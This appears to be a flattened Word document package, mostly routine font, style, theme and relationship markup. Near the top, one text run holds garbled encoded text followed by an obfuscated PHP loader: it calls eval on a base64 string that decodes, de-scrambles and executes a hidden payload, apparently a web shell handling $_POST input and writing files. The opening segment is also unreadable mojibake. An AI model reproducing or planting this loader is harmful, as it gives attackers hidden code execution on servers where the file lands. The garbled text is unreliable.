†⁜†›✭⹟ഊ††‬怠†›†簠††簠›††✮ഊ†‬怠†††尬簠††簬⼠†††✮ഊ†⼠†††††怭⸮⸭怠†††††對ਠ㨠††††††‮✮†††††††㨍ਠ簠††††††⸠✠⸠††††††簍ਠ簠††††††✠⸠✠††††††簍ਠ㨠††††††‧⸧†††††††㨍ਠ⁜†††††‬ⴧ✧⴬††††† ഊ†⁠⸠†††⼧簠††簧尠†††Ⱗഊ††⁠⹟†※†簠††簠※† Ⱗഊ††††怭⸺†簠††簠›Ⱝ✍ਠ††††††⁼††⁼ഊ†††††††簠††簍ਠ††††††⁼††⁼ഊ†††††††簠††簍ਠ††††††⁼††⁼ഊ∻ഊ††ഊ††ഊ††ഊ††㕣栲‧㱢爾䬴汬⁍㔿㱢爾㰱⁨爵昽⌠㉮捬㑣欽≧⡮㍬氬渳汬ⱜ❹㕳尧⤢㹙㕳㰯ㄾ㰯搴瘾✻ഊ७ㅤ䘲㉴㕲⠩㬍ਠ†‍ਠ納਍਍਴昨‵浰瑹⠤彐体呛✱❝⤠⤍ਉ㑦⠴獳㕴⠤搵昱㍬瑟ㅣ琴㉮⤠☦⁦㍮捴㐲湟㕸㑳瑳⠧洱搧‮․搵昱㍬瑟ㅣ琴㉮⤩ഊउ⑟偏協嬧ㄧ崠㴠⑤㕦ㄳ汴弱捴㐲渻ഊव汳㔍ਉत彐体呛✱❝‽‧䘴氵獍ㅮ✻ഊ㑦⠠ℵ浰瑹⠤彐体呛✱❝⤠☦⁦㍮捴㐲湟㕸㑳瑳⠧洱搧‮․彐体呛✱❝⤠⤍ਉ挱汬弳猵牟昳湣⠧洱搧‮․彐体呛✱❝⤻ഊव破琻ഊ㼾';eval($OOO0000O0('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?&gt;</w:t>
      </w:r>
    </w:p>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roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="61002a87" w:usb1="80000000" w:usb2="00000008" w:usb3="00000000" w:csb0="000001ff" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Verdana">
    <w:panose1 w:val="020b0604030504040204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="a10006ff" w:usb1="4000205b" w:usb2="00000010" w:usb3="00000000" w:csb0="0000019f" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Symbol">
    <w:panose1 w:val="05050102010706020507"/>
    <w:charset w:val="02"/>
    <w:family w:val="roman"/>
    <w:notTrueType w:val="on"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Wingdings">
    <w:panose1 w:val="05000000000000000000"/>
    <w:charset w:val="02"/>
    <w:family w:val="auto"/>
    <w:notTrueType w:val="on"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Arial Narrow">
    <w:panose1 w:val="020b0606020202030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Comic Sans MS">
    <w:panose1 w:val="030f0702030302020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="script"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Georgia">
    <w:panose1 w:val="02040502050405020303"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Palace Script MT">
    <w:panose1 w:val="02010501050101010102"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Webdings">
    <w:panose1 w:val="05030102010509060703"/>
    <w:charset w:val="02"/>
    <w:family w:val="roman"/>
    <w:notTrueType w:val="on"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Wingdings 2">
    <w:panose1 w:val="05020102010507070707"/>
    <w:charset w:val="02"/>
    <w:family w:val="roman"/>
    <w:notTrueType w:val="on"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Wingdings 3">
    <w:panose1 w:val="05040102010807070707"/>
    <w:charset w:val="02"/>
    <w:family w:val="roman"/>
    <w:notTrueType w:val="on"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Monotype Sorts">
    <w:panose1 w:val="05010101010101010101"/>
    <w:charset w:val="02"/>
    <w:family w:val="auto"/>
    <w:notTrueType w:val="on"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Cambria Math">
    <w:panose1 w:val="02040503050406030204"/>
    <w:charset w:val="0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footnotePr/>
  <w:endnotePr/>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sz w:val="22"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:pPrDefault>
  </w:docDefaults>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat w:val="on"/>
    <w:pPr>
      <w:keepNext w:val="on"/>
      <w:keepLines w:val="on"/>
      <w:spacing w:before="480" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:color w:val="365f91"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Footnotereference">
    <w:name w:val="Footnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:b/>
      <w:smallCaps/>
      <w:color w:val="c0504d"/>
      <w:spacing w:val="5"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:i/>
      <w:color w:val="4f81bd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat w:val="on"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="4f81bd" w:sz="4"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="280"/>
      <w:ind w:left="936" w:right="936"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="4f81bd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Endnotetext">
    <w:name w:val="Endnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EndnoteTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteTextChar">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footnotetext"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="on"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BookTitle">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:b/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footnotetext">
    <w:name w:val="Footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FootnoteTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
    <w:name w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:qFormat w:val="on"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:i/>
      <w:color w:val="243f60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PlainText">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PlainTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleReference">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="c0504d"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="Heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading9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color w:val="404040"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="Heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading8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color w:val="404040"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="IntenseQuoteChar">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="IntenseQuote"/>
    <w:uiPriority w:val="30"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="4f81bd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="Heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading7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color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:color w:val="4f81bd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading6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color w:val="243f60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:color w:val="243f60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5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color w:val="243f60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="4f81bd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat w:val="on"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4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b/>
      <w:i/>
      <w:color w:val="4f81bd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3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b/>
      <w:color w:val="4f81bd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2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b/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:rPr>
      <w:color w:val="0000ff"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat w:val="on"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:i/>
      <w:color w:val="4f81bd"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:color w:val="17365d"/>
      <w:spacing w:val="5"/>
      <w:sz w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:i/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:i/>
      <w:color w:val="404040"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:default="1" w:styleId="NoList">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:color w:val="404040"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat w:val="on"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="4f81bd" w:sz="8"/>
      </w:pBdr>
      <w:spacing w:after="300" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing w:val="on"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:color w:val="17365d"/>
      <w:spacing w:val="5"/>
      <w:sz w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:color w:val="365f91"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PlainTextChar">
    <w:name w:val="Plain Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="PlainText"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Endnotereference">
    <w:name w:val="Endnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:uiPriority w:val="11"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:i/>
      <w:color w:val="4f81bd"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="NormalTable">
    <w:name w:val="Normal Table"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:qFormat w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:tblPr>
      <w:tblInd w:w="0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat w:val="on"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing w:val="on"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EndnoteTextChar">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Endnotetext"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="on"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
</w:styles>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/></Relationships>
</file>

<file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="MS Office Theme">
  <a:themeElements>
    <a:clrScheme name="MS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SOffice">
      <a:majorFont>
        <a:latin typeface="Cambria"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
        <a:font script="Jpan" typeface="ＭＳ ゴシック"/>
        <a:font script="Arab" typeface="Times New Roman"/>
        <a:font script="Hebr" typeface="Times New Roman"/>
        <a:font script="Thai" typeface="Angsana New"/>
        <a:font script="Viet" typeface="Times New Roman"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Calibri"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
        <a:font script="Jpan" typeface="ＭＳ 明朝"/>
        <a:font script="Arab" typeface="Arial"/>
        <a:font script="Hebr" typeface="Arial"/>
        <a:font script="Thai" typeface="Cordia New"/>
        <a:font script="Viet" typeface="Arial"/>
      </a:minorFont>
    </a:fontScheme>
    <a:fmtScheme name="MS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vijaypillai222</dc:creator>
  <cp:lastModifiedBy>vijaypillai222</cp:lastModifiedBy>
</cp:coreProperties>
</file>